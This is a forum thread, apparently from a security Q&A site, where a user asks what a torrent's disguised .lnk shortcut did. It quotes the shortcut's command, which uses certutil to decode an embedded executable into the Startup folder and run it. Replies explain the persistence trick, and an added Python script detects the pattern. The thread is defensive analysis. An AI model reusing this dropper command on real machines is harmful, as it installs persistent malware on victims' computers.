
I downloaded a torrent which turned out to be a shortcut that did the following thing.

%ComSpec% /c certutil -decode "Succession.S02E07.720p.WEB.x265-MiNX.mkv.lnk" 
  "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\%USERNAME%.exe" >nul 2>&1 && 
  "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\%USERNAME%.exe"

Does anyone have any idea what this file did? I accidentally ran it.

The file was 222 MB large. I checked my startup folder but there seems to be nothing there, maybe because I pressed cancel when the cmd window popped up. But the file went from 222 MB to 1.85 KB after I ran it.

The link to the file is a torrent here https://thepiratebay.org/torrent/34688106/Succession.S02E07.720p.WEB.x265-MiNX

Downloading it won't do anything but running it will. I also ran an Avast scan and a Windows Defender scan on the file but they found nothing.

I re-downloaded the file and renamed the .lnk to .txt, it looks like a security certificate.

schroeder
anarchy

1 Answer


certutil is a built-in Windows program used to manage certificates. The above command would decode the certificate present in the file and install malware. An article illustrating how this could be used.

Rohith K D
  • Do you know how I can find it and remove it? Could it be ransomware? – anarchy Sep 23 '19 at 05:51
  • COMSPEC points to cmd. It then decodes the file using certutil and creates a .exe file in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup with your username as the .exe filename and executes it. – Rohith K D Sep 23 '19 at 06:14
  • So if the file is not in the startup folder I should be fine? – anarchy Sep 23 '19 at 06:14
  • Does it execute at the time of creation? Or during startup? – anarchy Sep 23 '19 at 06:16
  • Once the file is decoded successfully, the .exe would be executed. As long as the .exe is present in startup folder it will be executed on every startup. – Rohith K D Sep 23 '19 at 06:34
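As an added illustration (not part of the question or the answer above), this Python script does the check anarchy did by hand when renaming the .lnk to .txt: it looks for the PEM armour that certutil -encode writes, decodes it the way certutil -decode would, and reports whether the result is a Windows executable rather than a certificate. It also flags a command line that pairs certutil -decode with the Startup folder, the pattern from the question. The sample bytes and the regular expressions are constructed for this example.

```python
import base64
import re
from typing import Optional

# Constructed sample: a tiny fake payload wrapped the way certutil -encode
# writes it (PEM armour around base64). It is NOT a real executable, just
# bytes beginning with the PE "MZ" magic so the check has something to find.
FAKE_PAYLOAD = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"not a real program"
SAMPLE_LNK_BODY = (
    b"-----BEGIN CERTIFICATE-----\r\n"
    + base64.encodebytes(FAKE_PAYLOAD)  # encodebytes wraps lines like certutil does
    + b"-----END CERTIFICATE-----\r\n"
)

PEM_BLOCK = re.compile(
    rb"-----BEGIN CERTIFICATE-----\s*(.*?)\s*-----END CERTIFICATE-----", re.S
)

# Constructed pattern: certutil -decode writing into the per-user Startup folder.
STARTUP_DECODE = re.compile(
    r"certutil\s+-decode\b.*Start Menu\\Programs\\Startup", re.I
)


def decode_pem_payload(data: bytes) -> Optional[bytes]:
    """Return the bytes certutil -decode would produce, or None if no PEM block."""
    m = PEM_BLOCK.search(data)
    if not m:
        return None
    try:
        # validate=False drops the line breaks inside the base64 body
        return base64.b64decode(m.group(1), validate=False)
    except ValueError:
        return None


def looks_like_pe(blob: bytes) -> bool:
    """A real certificate is DER (starts with 0x30); a PE file starts with 'MZ'."""
    return blob[:2] == b"MZ"


def triage(data: bytes) -> dict:
    """Summarise what a suspicious .lnk/.txt body actually contains."""
    payload = decode_pem_payload(data)
    return {
        "has_pem_block": payload is not None,
        "decoded_size": len(payload) if payload else 0,
        "decodes_to_pe": bool(payload) and looks_like_pe(payload),
    }


def command_is_suspicious(cmdline: str) -> bool:
    """True when a command decodes a file straight into the Startup folder."""
    return bool(STARTUP_DECODE.search(cmdline))
```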